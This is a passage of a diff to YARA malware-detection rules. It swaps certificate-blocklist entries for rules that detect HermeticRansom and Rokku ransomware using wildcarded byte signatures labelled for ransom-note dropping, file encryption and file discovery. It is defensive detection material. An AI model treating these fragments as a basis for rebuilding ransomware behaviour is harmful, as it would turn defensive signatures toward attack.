"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0489577c6050f0c5d1dad5bda8c4f3c895902b932cd0324087712ccb83f14680" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $file_extensions_1 = { + 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 51 53 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8B 95 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 85 F9 00 00 00 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 4F FE FF FF E9 ?? ?? ?? ?? 8D 95 + } + $file_extensions_2 = { + ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 + } + $file_extensions_3 = { + 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B + 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + } + $file_extensions_4 = { + 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D + 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 + ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F + 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 + } + $file_extensions_5 = { + ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 + } + $parse_server_commands = { + 83 F9 ?? 0F 84 E0 00 00 00 50 53 56 57 89 C3 89 D6 89 CF 31 D2 8A 06 8A 56 ?? 3C ?? 74 25 3C ?? 74 3E 3C ?? 74 51 3C ?? + 74 5C 3C ?? 74 76 3C ?? 0F 84 84 00 00 00 3C ?? 0F 84 8B 00 00 00 E9 97 00 00 00 83 F9 ?? 89 D8 7F 0A E8 ?? ?? ?? ?? E9 + 91 00 00 00 89 CA E8 ?? ?? ?? ?? E9 85 00 00 00 83 F9 ?? 89 D8 7F 07 E8 ?? ?? ?? ?? EB 77 89 CA E8 ?? ?? ?? ?? EB 6E 89 + D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB 5F 55 89 D5 8B 54 2E ?? 89 D8 03 5C 2E ?? 8B 4C 2E ?? 8B 12 E8 62 FF FF FF 4F 7F + E8 5D EB 41 55 89 D5 89 D8 03 5C 2E ?? 89 F2 E8 ?? ?? ?? ?? 4F 7F F0 5D EB 2B 89 D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB + 1C 89 D8 89 F2 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F1 EB 0B 5F 5E 5B 58 B0 ?? E9 ?? ?? ?? ?? 5F 5E 5B 58 C3 8B C0 B9 ?? ?? ?? + ?? E9 0A FF FF FF C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Highweb Ireland Operations Limited" and (pe.signatures[i].serial=="00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" or pe.signatures[i].serial=="e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5") and 1597708800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($file_extensions_1 and $file_extensions_2 and $file_extensions_3 and $file_extensions_4 and $file_extensions_5) and $parse_server_commands) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Hermeticransom : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HermeticRansom ransomware." author = "ReversingLabs" - id = "0aea5110-569b-5d9c-a2ce-a6a9fe75b58e" - date = "2023-11-08" - modified = "2023-11-08" + id = "6aaf89f4-0cf8-5f0e-b89d-01ac7edd06c0" + date = "2022-05-13" + modified = "2022-05-13" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4538-L4554" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dbf85cbd1d92823287749dac312f95576900753f60a694347b31b1e3aaa288a8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.HermeticRansom.yara#L1-L105" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "123d569a9d9b9d855b3baafd6194f102d82a594fd7a2bba073843a8654a317cb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HermeticRansom" + tc_detection_factor = 5 importance = 25 + strings: + $drop_ransom_note = { + 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 3B 41 ?? + 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 0F 10 04 24 0F 11 44 24 ?? 0F 10 44 24 ?? 0F 11 44 24 ?? 0F 10 44 + 24 ?? 0F 11 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D BC 24 ?? ?? ?? + ?? 48 8D 35 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 + 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? + ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? + ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 + 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ?? + ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 14 24 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 8B 44 24 ?? 48 8B 4C 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 14 24 48 89 4C 24 ?? 48 89 + 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 + ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0C 24 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C + 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? + ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 + } + $encrypt_files_p1 = { + E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? + ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 89 14 24 + 48 89 74 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? + ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 54 24 ?? E8 + ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 + 85 DB 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D + 05 ?? ?? ?? ?? 48 89 04 24 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 24 ?? 48 89 C1 48 C1 F8 ?? 48 + C1 E8 ?? 48 01 C8 48 C1 F8 ?? 48 89 84 24 ?? ?? ?? ?? 48 C1 E0 ?? 48 29 C1 48 89 4C + 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 04 24 0F 57 C0 0F + 11 44 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? B8 ?? ?? ?? ?? + 48 89 84 24 ?? ?? ?? ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? + 48 39 C1 0F 8D ?? ?? ?? ?? 48 89 CA 48 C1 E1 ?? 48 FF C2 48 89 D3 48 C1 E2 ?? 48 39 + D1 0F 87 ?? ?? ?? ?? 48 8B 74 24 ?? 48 39 F2 0F 87 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? + ?? 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 89 3C 24 48 89 + } + $encrypt_files_p2 = { + 5C 24 ?? 48 89 44 24 ?? 48 29 CE 48 89 F3 48 F7 DE 48 C1 FE ?? 48 21 CE 48 8B BC 24 + ?? ?? ?? ?? 48 01 FE 48 89 74 24 ?? 48 29 CA 48 89 54 24 ?? 48 89 5C 24 ?? E8 ?? ?? + ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 0F 85 ?? + ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 + 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 F8 ?? 0F 8D ?? ?? ?? ?? 48 C1 E0 ?? 48 8B + 4C 24 ?? 48 39 C8 0F 87 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B + 35 ?? ?? ?? ?? 48 89 14 24 48 89 5C 24 ?? 48 89 74 24 ?? 48 8B 54 24 ?? 48 29 C2 48 + 89 D3 48 F7 DA 48 C1 FA ?? 48 21 C2 48 8B B4 24 ?? ?? ?? ?? 48 01 F2 48 89 54 24 ?? + 48 29 C1 48 89 4C 24 ?? 48 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? + 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 85 DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? + ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 + 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 89 1C 24 48 89 44 24 ?? 48 89 4C 24 + ?? 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B 84 24 + } + $find_files = { + 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 + EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? + 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 + 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 89 54 + 24 ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? + E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 94 + 24 ?? ?? ?? ?? 48 89 14 24 48 8B 9C 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 44 24 ?? 48 + 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? + ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 04 24 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 85 C9 75 + ?? 48 89 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 85 C0 74 ?? 48 8B 44 + 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? + C3 48 8B 44 24 ?? 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? + 48 83 C4 ?? C3 48 89 04 24 E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 6C 24 ?? 48 + 83 C4 ?? C3 48 8B 44 24 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "StarY Media Inc." and pe.signatures[i].serial=="3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" and 1599091200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_56D576A062491Ea0A5877Ced418203A1 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Rokku : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Rokku ransomware." author = "ReversingLabs" - id = "3db67353-6310-54ad-b46a-97daf63fee42" - date = "2023-11-08" - modified = "2023-11-08" + id = "8722ed4a-b480-57ec-bba7-ce7d0f3704b9" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4556-L4572" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "19bd6834b432f3dc8786b449241082b359275559a112a8ef4a51efe185b256dc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Rokku.yara#L1-L147" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fefb342f8a9afac3b40c343b830f334225ff4198d55504846aa855acf5dfc9ba" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Rokku" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 8B E9 C7 44 24 ?? ?? ?? ?? ?? 33 DB 89 6C 24 ?? + 56 0F 57 C0 66 C7 44 24 ?? ?? ?? 57 66 0F 13 44 24 ?? B2 ?? 88 5C 24 ?? 8B CB 8A C1 + 02 C2 30 44 0C ?? 41 83 F9 ?? 73 ?? 8A 54 24 ?? EB ?? 8B CD 88 5C 24 ?? E8 ?? ?? ?? + ?? 8D 54 24 ?? 8B C8 E8 ?? ?? ?? ?? 85 C0 75 ?? 40 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 51 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B D6 E8 ?? ?? ?? ?? 59 56 BE + ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 4C 24 ?? 6A + ?? 8B D5 E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C1 8B 94 24 ?? ?? ?? ?? 0B C2 0F 84 ?? + ?? ?? ?? 6A ?? 5D 3B D3 77 ?? 81 F9 ?? ?? ?? ?? 76 ?? 2B CD 1B D3 52 51 55 8D 4C 24 + ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C5 0F 85 ?? ?? ?? ?? 8B CD 8B C3 8A 90 ?? ?? ?? ?? 49 + 8A B0 ?? ?? ?? ?? 3A D6 75 ?? 40 85 C9 75 ?? 8B CB EB ?? 0F B6 C6 0F B6 CA 2B C8 85 + C9 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 8B D6 50 B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 19 41 83 E8 ?? 75 ?? + 8B 6C 24 ?? 8B 7C 24 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 2B C7 1B CD 3B EB + } + $encrypt_files_p2 = { + 7C ?? 7F ?? 81 FF ?? ?? ?? ?? 72 ?? 8B AC 24 ?? ?? ?? ?? 0F 57 C0 8B BC 24 ?? ?? ?? + ?? 8B 4C 24 ?? 55 57 66 0F 13 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 59 59 8B 4C 24 ?? + 3B CB 77 ?? 3B C3 77 ?? 8B F3 EB ?? 3B CB 77 ?? 72 ?? 3D ?? ?? ?? ?? 72 